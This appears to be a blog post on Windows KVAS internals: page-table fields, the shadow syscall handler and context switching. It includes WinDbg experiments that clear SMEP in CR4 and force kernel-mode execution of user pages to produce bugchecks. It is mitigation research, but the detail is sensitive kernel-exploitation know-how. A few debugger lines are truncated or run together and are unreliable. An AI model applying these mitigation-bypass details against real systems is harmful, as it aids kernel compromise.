Before KVAS, _KPROCESS.DirectoryTableBase held the base of the page tables for a particular process. Remember, on a system without KVAS or in a process where KVAS is disabled, the user and kernel page tables are not separated, so _KPROCESS.DirectoryTableBase is moved into CR3 on process context switch. When KVAS is enabled, _KPROCESS.DirectoryTableBase holds the complete (user and kernel) page table base. The value of _KPROCESS.DirectoryTableBase is moved into _KPRCB.KernelDirectoryTableBase when a process context switch occurs. The user-only page table base is held in _KPROCESS.UserDirectoryTableBase. The _KPROCESS.AddressPolicy field tells the kernel if a process participates in KVAS. If _KPROCESS.AddressPolicy is 1, then KVAS is disabled for the process; if it is 0, then KVAS is enabled. _KPRCB.ShadowFlags holds flags that tell the kernel if KVAS is enabled for the process (according to _KPROCESS.AddressPolicy) and which page table is active. On entry points to the kernel, the value from _KPRCB.KernelDirectoryTableBase is loaded into CR3. On exit from the kernel _KPROCESS.UserDirectoryTableBase is moved into CR3. _KPRCB.RspBaseShadow and _KPRCB.UserRspShadow hold the stack pointer for each mode and are loaded into RSP at entry/exit from the kernel, respectively.

In a KVAS participating process, the hardware address in CR3 has some flags in the bottom bits: bit 0 is set for a user mode page table and bit 1 is set for a kernel mode page table. This can be seen by examining _KPROCESS.DirectoryTableBase and _KPROCESS.UserDirectoryTableBase for a KVAS participating process (explorer.exe):

0: kd> !process 0 0 explorer.exe
PROCESS ffffb68d61dd9080
    SessionId: 1  Cid: 1098    Peb: 00fa4000  ParentCid: 1078
    DirBase: bd6de002  ObjectTable: ffffde87c9020e00  HandleCount: 2120.
    Image: explorer.exe

0: kd> .process /i /p ffffb68d61dd9080
0: kd> dt _KPROCESS @$proc DirectoryTableBase UserDirectoryTableBase
ntdll!_KPROCESS
   +0x028 DirectoryTableBase     : 0xbd6de002
   +0x388 UserDirectoryTableBase : 0xbd6dd001

To use the !vtop command with these values, just mask off the bottom bits.


The system call handler is different on systems wth KVAS enabled. The system call handler is located in Model Specific Register (MSR) 0xC0000082 (LSTAR) for x86 systems. On a x86_64 machine with KVAS explicitly disabled, the system call handler is KiSystemCall64 as shown below:

0: kd> db nt!KiKvaShadow L1
fffff805`2ec01840  00                                               .
0: kd> rdmsr c0000082
msr[c0000082] = fffff805`2e2066c0
0: kd> ln fffff805`2e2066c0
Browse module
Set bu breakpoint

(fffff805`2e2066c0)   nt!KiSystemCall64   |  (fffff805`2e206900)   nt!KiSystemServiceUser

At the top of the system call handler you can see that RSP is moved into _KPCR.UserRsp and _PRCB.RspBase is moved into RSP. _KPCR.UserRsp is then pushed onto the kernel stack for recovery later (at the end of the system call handler).

KiSystemCall64
The system call handler when KVAS is disabled for the system

Next, let's look at the system call handler that is used when KVAS is enabled on the system:

0: kd> db nt!KiKvaShadow L1
fffff804`75001840  01                                               .
0: kd> rdmsr c0000082
msr[c0000082] = fffff804`74c13180
0: kd> ln fffff804`74c13180
Browse module
Set bu breakpoint

(fffff804`74c13180)   nt!KiSystemCall64Shadow   |  (fffff804`74c14060)   nt!_guard_retpoline_icall_handler

KiSystemCall64Shadow is used. The beginning of this function is similar to KiSystemCall64, with a few extra steps. It backs up RSP to _KPRCB.UserRspShadow, swaps _KPRCB.KernelDirectoryTableBase into CR3 if the second bit of _KPRCB.ShadowFlags is set, and restores the kernel stack pointer to RSP from _KPRCB.RspBaseShadow, before pushing _KPRCB.UserRspShadow to the stack (as opposed to _KPCR.UserRsp). See the disassembly below:

KiSystemCall64Shadow
The system call handler when KVAS is enabled for the system

At the end of KiSystemCall64Shadow there is a jump to KiSystemServiceUser which is partway through KiSystemCall64.

KiSystemCall64Shadow_end
The end of the Shadow syscall handler jumps to the label KiSystemServiceUser, which is in the middle of KiSystemCall64

At the end of KiSystemCall64 there is a test to see if KiKvaShadow is 1 (KVAS enabled) and if it is a jump to KiKernelSysretExit is made.

KiSystemCall64_return
The end of KiSystemCall64 calls KiKernelSysretExit if KVAS is enabled

KiKernelSysretExit checks the 2nd bit of _KPRCB.ShadowFlags to see if KVAS is enforced for the process (0 = enforced, 1 = not enforced). If it is enforced, then _KPROCESS.UserDirectoryTableBase is loaded into CR3. If the low bit of _KPRCB.UserDirectoryTableBase is set and the low bit of _KPRCB.ShadowFlags is set, then the low bit of _KPRCB.ShadowFlags is unset indicating that the user page table is now in use.

KiKernelSysretExit
KiKernelSysretExit checks if CR3 needs to be updated or not on exit from the kernel

KiKernelSysretExit is called in a few different places. Unsurprisingly, these places are exit-points from the kernel.

KiKernelSysretExit_xref
KiKernelSysretExit is called in a few kernel exitpoint functions

Next, let's look at cross references of KiKvaShadow just to get an idea of what functions are affected by KVAS.

KiKvaShadow_xref
The shadow flag is checked in many places

There are quite a few functions where this flag is checked. Investigating interesting functions is an exercise left up to the reader.


Now that we have seen a few places where the kernel switches up CR3, let's look at thread context switching to see how it is handled. Thread context switching is performed by the nt!KiSwapContext function, which saves the context and then calls nt!SwapContext:

KiSwapContext
KiSwapContext is a small function that calls SwapContext

The RCX and RDX registers hold the destination and source _KTHREAD structures, respectively. These values are moved into RSI and RDI in preparation for a call to nt!SwapContext. An overview of SwapContext can be seen below:

SwapContext_overview
SwapContext is a fairly large function

In SwapContext, RDI is a pointer to the thread being switched out and RSI is a pointer to the thread being switched in. Among other things and especially important to us, SwapContext is responsible for switching in the correct page table to CR3, checking the destination process's address policy, and setting up _KPRCB.ShadowFlags as well as _KPRCB.KernelDirectoryTableBase. If the destination process is the same as the source process, this entire process is unnecessary and is skipped. If they are different, then they may have different address policies. The destination process (RSI.ApcState.Process) is loaded into R14 and then if KVAS is enabled on the system, the 2nd bit of _KPROCESS.DirectoryTableBase is checked to see if it is a kernel page table. If it is a kernel page table, the high bit of the page table will be set and the low bit of _KPRCB.ShadowFlags will be set. The (potentially) modified kernel page table address is then moved int _KPRCB.KernelDirectoryTableBase, the page table's high bit is unset, the 2nd bit of _KPRCB.ShadowFlags is masked off (unset), and _KPROCESS.AddressPolicy is checked. If the address policy is 1 (KVAS not enforced), then _KPRCB.ShadowFlags is xor-ed with 3 (0b11) to set the 2nd bit and unset the first resulting in a _KPRCB.ShadowFlags value of 2. Then, the page table address is put into CR3. Interrupts are disabled (cli) and then re-enabled (sti) to prevent the system from interrupting this process. If running under Hyper-V, then instead of accessing CR3 directly, a hypercall will be made to switch address spaces.

SwapContext_AddressPolicy
The correct ShadowFlags are set based on a number of checks, then CR3 is updated with the new page table base

A few blocks down, the thread's initial stack (_KTHREAD.InitialStack) is saved in _KPRCB.RspBase and either _KPCR.TssBase->Rsp0 or _KPRCB.RspBaseShadow; the latter is used on a KVAS enabled system.

SwapContext_tss_or_RspBaseShadow
The current thread's kernel stack base is kept in different places for KVAS and non-KVAS processes

On examination of these fields, we can see that on a KVAS enabled system _KPRCB.RspBase, _KPRCB.RspBaseShadow, and _KTHREAD.InitialStack are all the same value.

0: kd> dt _KPCR @$pcr Prcb.UserRspShadow Prcb.RspBase Prcb.RspBaseShadow TssBase->Rsp0
ntdll!_KPCR
   +0x008 TssBase            : 
      +0x004 Rsp0               : 0xfffff804`78c64200
   +0x180 Prcb               : 
      +0x028 RspBase            : 0xffff828b`d7d02c90
      +0x8e88 RspBaseShadow      : 0xffff828b`d7d02c90
      +0x8e90 UserRspShadow      : 0x555ee68
0: kd> dt _KTHREAD @$thread InitialStack
ntdll!_KTHREAD
   +0x028 InitialStack : 0xffff828b`d7d02c90 Void

On a KVAS disabled system, _KPCR.TssBase->Rsp0, _KPRCB.RspBase, and _KTHREAD.InitialStack are all the same value.

0: kd> dt _KPCR @$pcr Prcb.UserRspShadow Prcb.RspBase Prcb.RspBaseShadow TssBase->Rsp0
nt!_KPCR
   +0x008 TssBase            : 
      +0x004 Rsp0               : 0xfffff805`31d3cc90
   +0x180 Prcb               : 
      +0x028 RspBase            : 0xfffff805`31d3cc90
      +0x8e88 RspBaseShadow      : 0
      +0x8e90 UserRspShadow      : 0
0: kd> dt _KTHREAD @$thread InitialStack
nt!_KTHREAD
   +0x028 InitialStack : 0xfffff805`31d3cc90 Void

A final question: What do all of these functions have in common?
They are all in the KVASCODE section of the kernel binary.

KVASCODE
The KVASCODE section is mapped for both sets of page tables

This section of the kernel binary is mapped in both sets of page tables! To validate this claim, let's use !vtop to resolve nt!KiSystemCall64Shadow (0xfffff80474c13180) in both sets of page tables.

0: kd> dt _KPROCESS @$proc DirectoryTableBase UserDirectoryTableBase
ntdll!_KPROCESS
   +0x028 DirectoryTableBase     : 0xbd6de002
   +0x388 UserDirectoryTableBase : 0xbd6dd001
0: kd> !vtop 0xbd6de000 0xfffff80474c13180
Amd64VtoP: Virt fffff80474c13180, pagedir 00000000bd6de000
Amd64VtoP: PML4E 00000000bd6def80
Amd64VtoP: PDPE 0000000004809088
Amd64VtoP: PDE 000000000480ad30
Amd64VtoP: Large page mapped phys 0000000003213180
Virtual address fffff80474c13180 translates to physical address 3213180.
0: kd> !vtop 0xbd6dd000 0xfffff80474c13180
Amd64VtoP: Virt fffff80474c13180, pagedir 00000000bd6dd000
Amd64VtoP: PML4E 00000000bd6ddf80
Amd64VtoP: PDPE 000000013cd21088
Amd64VtoP: PDE 000000013cd20d30
Amd64VtoP: PTE 000000013cd27098
Amd64VtoP: Mapped phys 0000000003213180
Virtual address fffff80474c13180 translates to physical address 3213180.

The address maps successfully to physical address 3213180 in both sets of page tables for this particular process. This makes sense because if these functions didn't exist in both sets of page tables then the implementation would not be able to do the switch properly. The backing memory would not exist according to the page table at some point during the function (either before or after the CR3 switch).

Experiments

Now onto my experiments. For each experiment I will run the same commands on a system with KVAS enabled and also on a system with KVAS disabled and note the differences. Hopefully this will help you understand the implementation a bit better! I know it has helped me.

KVAS Implemetation

For the first experiment, I will show the effect of KVAS by showing a function that exists in one page table, but not the other on the KVAS enabled system. I will also show that the system call handler is different between the two systems.

First, I will switch process contexts to explorer.exe then I will look at what is in MSR 0xC0000082 (LSTAR). Next, I will look up the page tables used by the process and try to resolve the physical address of nt!NtCreateFile in each page table using !vtop.

KVAS Enabled

1: kd> !cpuinfo
CP  F/M/S Manufacturer  MHz PRCB Signature    MSR 8B Signature Features
 0  6,158,10 GenuineIntel 2592 000000d600000000                   311b3dff
 1  6,158,10 GenuineIntel 2592 000000d600000000 >000000d600000000 !process 0 0 explorer.exe
PROCESS ffffb68d61dd9080
    SessionId: 1  Cid: 1098    Peb: 00fa4000  ParentCid: 1078
    DirBase: bd6de002  ObjectTable: ffffde87c9020e00  HandleCount: 2360.
    Image: explorer.exe

1: kd> .process /i /p ffffb68d61dd9080
You need to continue execution (press 'g' ) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
1: kd> g
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus:
fffff804`745fd0b0 cc              int     3
1: kd> .reload
Connected to Windows 10 19041 x64 target at (Fri Nov 27 20:52:29.550 2020 (UTC - 5:00)), ptr64 TRUE
Loading Kernel Symbols
...............................................................
................................................................
Loading User Symbols
.......................................................
Loading unloaded module list
1: kd> dt nt!_KPROCESS @$proc DirectoryTableBase
   +0x028 DirectoryTableBase : 0xbd6de002
1: kd> dt nt!_KPROCESS @$proc UserDirectoryTableBase
   +0x388 UserDirectoryTableBase : 0xbd6dd001
1: kd> dt nt!_KPCR @$pcr Prcb.KernelDirectoryTableBase
   +0x180 Prcb                          : 
      +0x8e80 KernelDirectoryTableBase      : 0x80000000`bd6de002
1: kd> rdmsr c0000082
msr[c0000082] = fffff804`74c13180
1: kd> ln fffff804`74c13180
Browse module
Set bu breakpoint

(fffff804`74c13180)   nt!KiSystemCall64Shadow   |  (fffff804`74c14060)   nt!_guard_retpoline_icall_handler
Exact matches:
1: kd> ? nt!NtCreateFile
Evaluate expression: -8776958611312 = fffff804`747ff090
1: kd> !vtop
usage: vtop PFNOfPDE VA
1: kd> !vtop 0xbd6de000 0xfffff804747ff090
Amd64VtoP: Virt fffff804747ff090, pagedir 00000000bd6de000
Amd64VtoP: PML4E 00000000bd6def80
Amd64VtoP: PDPE 0000000004809088
Amd64VtoP: PDE 000000000480ad18
Amd64VtoP: Large page mapped phys 0000000002dff090
Virtual address fffff804747ff090 translates to physical address 2dff090.
1: kd> !vtop 0xbd6dd000 0xfffff804747ff090
Amd64VtoP: Virt fffff804747ff090, pagedir 00000000bd6dd000
Amd64VtoP: PML4E 00000000bd6ddf80
Amd64VtoP: PDPE 000000013cd21088
Amd64VtoP: PDE 000000013cd20d18
Amd64VtoP: zero PDE
Virtual address fffff804747ff090 translation fails, error 0xD0000147.
1: kd> r cr3
cr3=00000000bd6de002
1: kd> !pte nt!NtCreateFile
                                           VA fffff804747ff090
PXE at FFFF87C3E1F0FF80    PPE at FFFF87C3E1FF0088    PDE at FFFF87C3FE011D18    PTE at FFFF87FC023A3FF8
contains 0000000004809063  contains 000000000480A063  contains 0A00000002C000A1  contains 0000000000000000
pfn 4809      ---DA--KWEV  pfn 480a      ---DA--KWEV  pfn 2c00      --L-A--KREV  LARGE PAGE pfn 2dff        

1: kd> !pte ntdll!NtCreateFile
                                           VA 00007ffe181ec830
PXE at FFFF87C3E1F0F7F8    PPE at FFFF87C3E1EFFFC0    PDE at FFFF87C3DFFF8600    PTE at FFFF87BFFF0C0F60
contains 8A0000003F8EA867  contains 0A0000003DFF0867  contains 0A0000003DFF1867  contains 01000001006B4025
pfn 3f8ea     ---DA--UW-V  pfn 3dff0     ---DA--UWEV  pfn 3dff1     ---DA--UWEV  pfn 1006b4    ----A--UREV

KVAS Disabled

0: kd> !cpuinfo
CP  F/M/S Manufacturer  MHz PRCB Signature    MSR 8B Signature Features
 0  6,158,10 GenuineIntel 2592 000000d600000000 >000000d600000000 !process 0 0 explorer.exe
PROCESS ffffc8064497b340
    SessionId: 1  Cid: 1038    Peb: 0090c000  ParentCid: 100c
    DirBase: beb3c000  ObjectTable: ffffa2827c3a1800  HandleCount: 2254.
    Image: explorer.exe

0: kd> .process /i /p ffffc8064497b340
You need to continue execution (press 'g' ) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus:
fffff805`2e1fd0b0 cc              int     3
0: kd> .reload
Connected to Windows 10 19041 x64 target at (Fri Nov 27 20:52:32.030 2020 (UTC - 5:00)), ptr64 TRUE
Loading Kernel Symbols
...............................................................
................................................................
...............................................................
Loading User Symbols
.............
Loading unloaded module list
.............
0: kd> dt nt!_KPROCESS @$proc DirectoryTableBase
   +0x028 DirectoryTableBase : 0xbeb3c000
0: kd> dt nt!_KPROCESS @$proc UserDirectoryTableBase
   +0x388 UserDirectoryTableBase : 0
0: kd> dt nt!_KPCR @$pcr Prcb.KernelDirectoryTableBase
   +0x180 Prcb                          : 
      +0x8e80 KernelDirectoryTableBase      : 0
0: kd> rdmsr c0000082
msr[c0000082] = fffff805`2e2066c0
0: kd> ln fffff805`2e2066c0
Browse module
Set bu breakpoint

(fffff805`2e2066c0)   nt!KiSystemCall64   |  (fffff805`2e206900)   nt!KiSystemServiceUser
Exact matches:
0: kd> ? nt!NtCreateFile
Evaluate expression: -8773842243440 = fffff805`2e3ff090
0: kd> !vtop 0xbeb3c000 0xfffff8052e3ff090
Amd64VtoP: Virt fffff8052e3ff090, pagedir 00000000beb3c000
Amd64VtoP: PML4E 00000000beb3cf80
Amd64VtoP: PDPE 0000000004b090a0
Amd64VtoP: PDE 0000000004b0ab88
Amd64VtoP: Large page mapped phys 0000000002dff090
Virtual address fffff8052e3ff090 translates to physical address 2dff090.
0: kd> r cr3
cr3=00000000beb3c000
0: kd> !pte nt!NtCreateFile
                                           VA fffff8052e3ff090
PXE at FFFFE5F2F97CBF80    PPE at FFFFE5F2F97F00A0    PDE at FFFFE5F2FE014B88    PTE at FFFFE5FC02971FF8
contains 0000000004B09063  contains 0000000004B0A063  contains 0A00000002C001A1  contains 0000000000000000
pfn 4b09      ---DA--KWEV  pfn 4b0a      ---DA--KWEV  pfn 2c00      -GL-A--KREV  LARGE PAGE pfn 2dff        

0: kd> !pte ntdll!NtCreateFile
                                           VA 00007ffc3608c830
PXE at FFFFE5F2F97CB7F8    PPE at FFFFE5F2F96FFF80    PDE at FFFFE5F2DFFF0D80    PTE at FFFFE5BFFE1B0460
contains 0A000000BC048867  contains 0A0000000604E867  contains 0A00000005350867  contains 010000006A1EC025
pfn bc048     ---DA--UWEV  pfn 604e      ---DA--UWEV  pfn 5350      ---DA--UWEV  pfn 6a1ec     ----A--UREV

Results

The page table lookup for nt!NtCreateFile fails for the user page table on the KVAS enabled system! This means KVAS is working just fine.

Software SMEP

For the next test, I will show that Software SMEP is enforced at the top level of the page tables on a KVAS enabled system.

I will resolve the address of the PML4 entry for ntdll!NtCreateFile for all page tables utilized via !vtop, then I will look at the page permissions applied using dt -p.

KVAS Enabled

1: kd> ? ntdll!NtCreateFile
Evaluate expression: 140729303091248 = 00007ffe`181ec830
1: kd> !vtop 0xbd6dd000 0x00007ffe181ec830
Amd64VtoP: Virt 00007ffe181ec830, pagedir 00000000bd6dd000
Amd64VtoP: PML4E 00000000bd6dd7f8
Amd64VtoP: PDPE 000000003f8eafc0
Amd64VtoP: PDE 000000003dff0600
Amd64VtoP: PTE 000000003dff1f60
Amd64VtoP: Mapped phys 00000001006b4830
Virtual address 7ffe181ec830 translates to physical address 1006b4830.
1: kd> !vtop 0xbd6de000 0x00007ffe181ec830
Amd64VtoP: Virt 00007ffe181ec830, pagedir 00000000bd6de000
Amd64VtoP: PML4E 00000000bd6de7f8
Amd64VtoP: PDPE 000000003f8eafc0
Amd64VtoP: PDE 000000003dff0600
Amd64VtoP: PTE 000000003dff1f60
Amd64VtoP: Mapped phys 00000001006b4830
Virtual address 7ffe181ec830 translates to physical address 1006b4830.
1: kd> dt -p nt!_MMPTE_HARDWARE @@(0x0000000bd6dd7f8)
   +0x000 Valid            : 0y1
   +0x000 Dirty1           : 0y1
   +0x000 Owner            : 0y1
   +0x000 WriteThrough     : 0y0
   +0x000 CacheDisable     : 0y0
   +0x000 Accessed         : 0y1
   +0x000 Dirty            : 0y1
   +0x000 LargePage        : 0y0
   +0x000 Global           : 0y0
   +0x000 CopyOnWrite      : 0y0
   +0x000 Unused           : 0y0
   +0x000 Write            : 0y1
   +0x000 PageFrameNumber  : 0y000000000000000000111111100011101010 (0x3f8ea)
   +0x000 ReservedForHardware : 0y0000
   +0x000 ReservedForSoftware : 0y0000
   +0x000 WsleAge          : 0y1010
   +0x000 WsleProtection   : 0y000
   +0x000 NoExecute        : 0y0
1: kd> dt -p nt!_MMPTE_HARDWARE @@(0x00000000bd6de7f8)
   +0x000 Valid            : 0y1
   +0x000 Dirty1           : 0y1
   +0x000 Owner            : 0y1
   +0x000 WriteThrough     : 0y0
   +0x000 CacheDisable     : 0y0
   +0x000 Accessed         : 0y1
   +0x000 Dirty            : 0y1
   +0x000 LargePage        : 0y0
   +0x000 Global           : 0y0
   +0x000 CopyOnWrite      : 0y0
   +0x000 Unused           : 0y0
   +0x000 Write            : 0y1
   +0x000 PageFrameNumber  : 0y000000000000000000111111100011101010 (0x3f8ea)
   +0x000 ReservedForHardware : 0y0000
   +0x000 ReservedForSoftware : 0y0000
   +0x000 WsleAge          : 0y1010
   +0x000 WsleProtection   : 0y000
   +0x000 NoExecute        : 0y1

KVAS Disabled

0: kd> ? ntdll!NtCreateFile
Evaluate expression: 140721215031344 = 00007ffc`3608c830
0: kd> !vtop 0xbeb3c000 0x00007ffc3608c830
Amd64VtoP: Virt 00007ffc3608c830, pagedir 00000000beb3c000
Amd64VtoP: PML4E 00000000beb3c7f8
Amd64VtoP: PDPE 00000000bc048f80
Amd64VtoP: PDE 000000000604ed80
Amd64VtoP: PTE 0000000005350460
Amd64VtoP: Mapped phys 000000006a1ec830
Virtual address 7ffc3608c830 translates to physical address 6a1ec830.
0: kd> dt -p nt!_MMPTE_HARDWARE @@(0x0000000beb3c7f8)
   +0x000 Valid            : 0y1
   +0x000 Dirty1           : 0y1
   +0x000 Owner            : 0y1
   +0x000 WriteThrough     : 0y0
   +0x000 CacheDisable     : 0y0
   +0x000 Accessed         : 0y1
   +0x000 Dirty            : 0y1
   +0x000 LargePage        : 0y0
   +0x000 Global           : 0y0
   +0x000 CopyOnWrite      : 0y0
   +0x000 Unused           : 0y0
   +0x000 Write            : 0y1
   +0x000 PageFrameNumber  : 0y000000000000000010111100000001001000 (0xbc048)
   +0x000 ReservedForHardware : 0y0000
   +0x000 ReservedForSoftware : 0y0000
   +0x000 WsleAge          : 0y1010
   +0x000 WsleProtection   : 0y000
   +0x000 NoExecute        : 0y0

Results

The PML4 entry for the kernel page table has the NoExecute bit set for user mode addresses. Even if the processor does not support SMEP, an access violation will be thrown on attempted execution from kernel mode if the kernel page table is in CR3. The KVAS disabled system does not have separate page tables, so the user code must be executable.

KVAS Disabled in Privileged Processes

Next up is showing that KVAS is disabled for privileged/elevated processes.

I will switch to a non-elevated instance of cmd.exe and look at _KPROCESS.DirectoryTableBase, _KPROCESS.UserDirectoryTableBase, _KPROCESS.AddressPolicy, _KPRCB.KernelDirectoryTableBase, and _KPRCB.ShadowFlags and then I will show the same fields when in the context of an elevated cmd.exe instance.

Non-Elevated Process

0: kd> !process 0 0 cmd.exe
PROCESS ffffb68d5b96f080
    SessionId: 1  Cid: 0dd4    Peb: 100343000  ParentCid: 1098
    DirBase: 0785a002  ObjectTable: ffffde87d25062c0  HandleCount:  68.
    Image: cmd.exe

0: kd> .process /i /p ffffb68d5b96f080
You need to continue execution (press 'g' ) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus:
fffff804`745fd0b0 cc              int     3
1: kd> dt nt!_KPROCESS @$proc DirectoryTableBase UserDirectoryTableBase AddressPolicy
   +0x028 DirectoryTableBase     : 0x785a002
   +0x388 UserDirectoryTableBase : 0xbb659001
   +0x390 AddressPolicy          : 0 ''
1: kd> dt nt!_KPRCB @$prcb KernelDirectoryTableBase ShadowFlags
   +0x8e80 KernelDirectoryTableBase : 0x80000000`0785a002
   +0x8e98 ShadowFlags              : 1

Elevated Process

0: kd> !process 0 0 cmd.exe
PROCESS ffffb68d63bb7080
    SessionId: 1  Cid: 0a58    Peb: 52134af000  ParentCid: 1098
    DirBase: 8b073002  ObjectTable: ffffde87d250e100  HandleCount:  65.
    Image: cmd.exe

0: kd> .process /i /p ffffb68d63bb7080
You need to continue execution (press 'g' ) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus:
fffff804`745fd0b0 cc              int     3
1: kd> dt nt!_KPROCESS @$proc DirectoryTableBase UserDirectoryTableBase AddressPolicy
   +0x028 DirectoryTableBase     : 0x8b073002
   +0x388 UserDirectoryTableBase : 1
   +0x390 AddressPolicy          : 0x1 ''
1: kd> dt nt!_KPRCB @$prcb KernelDirectoryTableBase ShadowFlags
   +0x8e80 KernelDirectoryTableBase : 0x80000000`8b073002
   +0x8e98 ShadowFlags              : 2

Results

The non-elevated process has a _KPROCESS.AddressPolicy of 0 and the 1st bit of _KPRCB.ShadowFlags set. The elevated process does not have a valid _KPROCESS.UserDirectoryTableBase, has a _KPROCESS.AddressPolicy of 1, and has the 2nd bit set in _KPRCB.ShadowFlags.

Faults

For this section I will be testing the existence of software SMEP by running with permutations of not only KVAS enabled/disabled, but also with SMEP enabled/disabled. For each case, I have outlined an expected result for fun, let's see if my assumptions match up with reality!

To test, I'll context switch to a KVAS enabled process (or any process on the KVAS disabled system), set the instruction pointer to executable code in user mode, then I'll single step and see what happens to the system in each case.

KVAS Enabled, SMEP Enabled

Expected result: fault on user mode page execution in kernel mode

0: kd> !process 0 0 explorer.exe
PROCESS ffff848c6c231340
    SessionId: 1  Cid: 10b8    Peb: 00d61000  ParentCid: 1064
    DirBase: b3bd4002  ObjectTable: ffffc40b7e99ec00  HandleCount: 1684.
    Image: explorer.exe

0: kd> .process /i /p ffff848c6c231340
You need to continue execution (press 'g' ) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus:
fffff804`445fd0b0 cc              int     3
1: kd> .reload /user
Loading User Symbols
................................................................
................................................................
................................................................
................................................................
..........
1: kd> u kernel32+216e L1
KERNEL32!SortGetSortKey+0xede:
00007fff`a74c216e cc              int     3
1: kd> r rip=kernel32+216e
1: kd> p
KERNEL32!SortGetSortKey+0xedf:
00007fff`a74c216f fc              cld
1: kd> p
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000fc
                       (0x00007FFFA74C216F,0x0200000008782025,0xFFFFFB874D733940,0x0000000080000005)


A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff804`445fd0b0 cc              int     3
1: kd> g
Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff804`445fd0b0 cc              int     3
1: kd> !analyze -v
Connected to Windows 10 19041 x64 target at (Fri Nov 27 22:45:37.050 2020 (UTC - 5:00)), ptr64 TRUE
Loading Kernel Symbols
...............................................................
................................................................
.............................................................
Loading User Symbols
................................................................
................................................................
................................................................
................................................................
..........
Loading unloaded module list
................
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY (fc)
An attempt was made to execute non-executable memory.  The guilty driver
is on the stack trace (and is typically the current instruction pointer).
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: 00007fffa74c216f, Virtual address for the attempted execute.
Arg2: 0200000008782025, PTE contents.
Arg3: fffffb874d733940, (reserved)
Arg4: 0000000080000005, (reserved)

KVAS Disabled, SMEP Enabled

Expected result: fault on user mode page execution in kernel mode

0: kd> !process 0 0 explorer.exe
PROCESS ffff9787d1477080
    SessionId: 1  Cid: 10ac    Peb: 01182000  ParentCid: 1094
    DirBase: b2f75000  ObjectTable: ffff8601a3fc3200  HandleCount: 1911.
    Image: explorer.exe

0: kd> .process /i /p ffff9787d1477080
You need to continue execution (press 'g' ) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus:
fffff801`2a9fd0b0 cc              int     3
1: kd> .reload /user
Loading User Symbols
................................................................
................................................................
................................................................
..............................................................
1: kd> u kernel32+216e L1
KERNEL32!SortGetSortKey+0xede:
00007ffb`a752216e cc              int     3
1: kd> r rip=kernel32+216e
1: kd> p
KERNEL32!SortGetSortKey+0xedf:
00007ffb`a752216f fc              cld
1: kd> p
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000fc
                       (0x00007FFBA752216F,0x010000000A8B1025,0xFFFFED060F7F0940,0x0000000080000005)


A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff801`2a9fd0b0 cc              int     3
1: kd> g
Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff801`2a9fd0b0 cc              int     3
1: kd> !analyze -v
Connected to Windows 10 19041 x64 target at (Fri Nov 27 22:48:37.554 2020 (UTC - 5:00)), ptr64 TRUE
Loading Kernel Symbols
...............................................................
................................................................
.............................................................
Loading User Symbols
................................................................
................................................................
................................................................
..............................................................
Loading unloaded module list
..............
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY (fc)
An attempt was made to execute non-executable memory.  The guilty driver
is on the stack trace (and is typically the current instruction pointer).
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: 00007ffba752216f, Virtual address for the attempted execute.
Arg2: 010000000a8b1025, PTE contents.
Arg3: ffffed060f7f0940, (reserved)
Arg4: 0000000080000005, (reserved)

KVAS Enabled, SMEP Disabled

Expected result: fault on user mode page execution in kernel mode via Software SMEP

0: kd> !process 0 0 explorer.exe
PROCESS ffffd18ad3a31340
    SessionId: 1  Cid: 0acc    Peb: 00c3c000  ParentCid: 0d20
    DirBase: 3f159002  ObjectTable: ffffac865a3e3780  HandleCount: 1667.
    Image: explorer.exe

0: kd> .process /i /p ffffd18ad3a31340
You need to continue execution (press 'g' ) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
1: kd> .reload /user
Loading User Symbols
................................................................
................................................................
................................................................
................................................................


************* Symbol Loading Error Summary **************
Module name            Error
SharedUserData         No error - symbol load deferred

You can troubleshoot most symbol related issues by turning on symbol loading diagnostics (!sym noisy) and repeating the command that caused symbols to be loaded.
You should also verify that your symbol search path (.sympath) is correct.
1: kd> u kernel32+216e L1
KERNEL32!SortGetSortKey+0xede:
00007ff9`abfd216e cc              int     3
1: kd> r rip=kernel32+216e
1: kd> r cr4=@@C++(@cr4 & ~(1 p
KERNEL32!SortGetSortKey+0xedf:
00007ff9`abfd216f fc              cld
1: kd> p
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000fc
                       (0x00007FF9ABFD216F,0x030000000F670025,0xFFFF9884AB7F0940,0x0000000080000005)


A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff803`753fd0b0 cc              int     3
1: kd> !analyze -v
The debuggee is ready to run
